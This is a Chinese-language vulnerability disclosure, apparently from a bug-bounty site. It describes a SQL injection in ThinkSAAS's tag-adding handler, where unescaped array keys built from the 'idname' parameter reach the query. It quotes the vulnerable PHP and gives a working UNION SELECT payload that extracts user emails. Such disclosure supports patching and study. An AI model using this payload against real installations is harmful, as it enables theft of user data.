Thinksaas某处绕过过滤的注射漏洞

### 简要描述： 添加标签过滤不严。 ### 详细说明： 今天下了一个thinksaas 最新版， 就看了看 在xfkxfk 爆了一些洞后 还是变安全了一些。 但是还是有很多依旧没过滤。 xfkxfk 爆了app/tag/action/add.php 我看的漏洞文件 app/tag/action/add_ajax.php ``` case "do": $objname = t($_POST['objname']); $idname = t($_POST['idname']); $objid = t($_POST['objid']); $tags = t($_POST['tags']); $new['tag']->addTag($objname,$idname,$objid,$tags); echo "<script language=JavaScript>parent.window.location.reload();</script>"; break; } ``` 做了过滤 function t($text) { $text = preg_replace ( '/\[.*?\]/is', '', $text ); $text = cleanJs ( $text ); // 彻底过滤空格BY QINIAO $text = preg_replace ( '/\s(?=\s)/', '', $text ); $text = preg_replace ( '/[\n\r\t]/', ' ', $text ); $text = str_replace ( ' ', ' ', $text ); // $text = str_replace ( ' ', '', $text ); $text = str_replace ( '&nbsp;', '', $text ); $text = str_replace ( '&', '', $text ); $text = str_replace ( '=', '', $text ); $text = str_replace ( '-', '', $text ); $text = str_replace ( '#', '', $text ); $text = str_replace ( '%', '', $text ); $text = str_replace ( '!', '', $text ); $text = str_replace ( '@', '', $text ); $text = str_replace ( '^', '', $text ); $text = str_replace ( '*', '', $text ); $text = str_replace ( 'amp;', '', $text ); $text = str_replace ( 'position', '', $text ); $text = strip_tags ( $text ); $text = htmlspecialchars ( $text ); $text = str_replace ( "'", "", $text ); return $text; }</code> 过滤了单引号 还有各种注释。。 过滤了之后 带入了addTag ``` function addTag($objname,$idname,$objid,$tags){ if($objname != '' && $idname != '' && $objid!='' && $tags!=''){ $tags = str_replace ( '，', ',', $tags ); $arrTag = explode(',',$tags); foreach($arrTag as $item){ $tagname = t($item); if(strlen($tagname) < '32' && $tagname != ''){ $uptime = time(); $tagcount = $this->findCount('tag',array( 'tagname'=>$tagname, )); if($tagcount == '0'){ $tagid = $this->create('tag',array( 'tagname'=>$tagname, 'uptime'=>$uptime, )); $tagIndexCount = $this->findCount('tag_'.$objname.'_index',array( $idname=>$objid, 'tagid'=>$tagid, )); if($tagIndexCount == '0'){ $this->create("tag_".$objname."_index",array( $idname=>$objid, 'tagid'=>$tagid, )); } $tagIdCount = $this->findCount("tag_".$objname."_index",array( 'tagid'=>$tagid, )); $count_obj = "count_".$objname; $this->update('tag',array( 'tagid'=>$tagid, ),array( $count_obj=>$tagIdCount, )); }else{ $tagData = $this->find('tag',array( 'tagname'=>$tagname, )); $tagIndexCount = $this->findCount("tag_".$objname."_index",array( $idname=>$objid, 'tagid'=>$tagData['tagid'], )); if($tagIndexCount == '0'){ $this->create("tag_".$objname."_index",array( $idname=>$objid, 'tagid'=>$tagData['tagid'], )); } $tagIdCount = $this->findCount("tag_".$objname."_index",array( 'tagid'=>$tagData['tagid'], )); $count_obj = "count_".$objname; $this->update('tag',array( 'tagid'=>$tagData['tagid'], ),array( $count_obj=>$tagIdCount, 'uptime'=>$uptime, )); } } } } } ``` ``` $tagIndexCount = $this->findCount('tag_'.$objname.'_index',array( $idname=>$objid, 'tagid'=>$tagid, )); ``` 可以看到 直接$idname 做key了。 ``` public function findCount($table, $conditions = null) { $where = ""; if (is_array ( $conditions )) { $join = array (); foreach ( $conditions as $key => $condition ) { $condition = $this->escape ( $condition ); $join [] = "{$key} = {$condition}"; } $where = "WHERE " . join ( " AND ", $join ); } else { if (null != $conditions) $where = "WHERE " . $conditions; } $sql = "SELECT COUNT(*) AS ts_counter FROM " . dbprefix . "{$table} {$where}"; $result = $this->db->once_fetch_assoc ( $sql ); return $result ['ts_counter']; } ``` 但是key是未过滤的。过滤了value 所以这里function t 过滤了单引号也没什么了 因为可以在key那里注入。 但是过滤了注释 后面这样就行了 objid=123&objname=article&idname=123 union select email from ts_user limit 1,1;a&tags=idname 即可注入。 可以盲注 、延时。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201402/031534110ee2c68d17906156a9d5240c15473f3f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/031534110ee2c68d17906156a9d5240c15473f3f.jpg) [<img src="https://images.seebug.org/upload/201402/0315342619a987dacc91dfdaee8ef6e70936faa0.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/0315342619a987dacc91dfdaee8ef6e70936faa0.jpg) 嗯 可以执行了。